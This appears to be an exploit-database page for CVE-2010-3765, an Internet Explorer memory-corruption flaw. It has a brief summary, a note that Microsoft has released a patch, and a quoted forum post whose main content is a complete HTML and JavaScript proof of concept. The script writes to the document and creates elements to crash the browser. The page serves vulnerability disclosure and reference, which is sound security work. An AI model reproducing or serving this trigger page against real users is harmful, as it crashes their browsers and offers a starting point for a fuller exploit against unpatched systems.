header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
extraexploit

Proof of Concept for CVE-2010-3765

This proof of concept exploits a buffer overflow vulnerability in the way Internet Explorer handles certain HTML elements. The vulnerability is triggered when a maliciously crafted HTML page is opened in Internet Explorer. The proof of concept code creates a series of HTML elements, which when rendered by Internet Explorer, causes a buffer overflow and results in a crash.

Mitigation:

Microsoft has released a security update to address this vulnerability. Users should apply the update as soon as possible.
Source

Exploit-DB raw data:

Hi there,

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:

<html><body>
<script>

  function G(str){
    var cobj=document.createElement(str);
    document.body.appendChild(cobj);
    cobj.scrollWidth;
  }

  function crashme() {
    document.write("fooFOO");
    G("a");
    document.write("<a lang></a>a");
    G("base");
    document.write("barBAR");
    G("audio");
  }
</script>
<script>crashme();</script>
</body>
</html>

For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
-- 
http://extraexploit.blogspot.com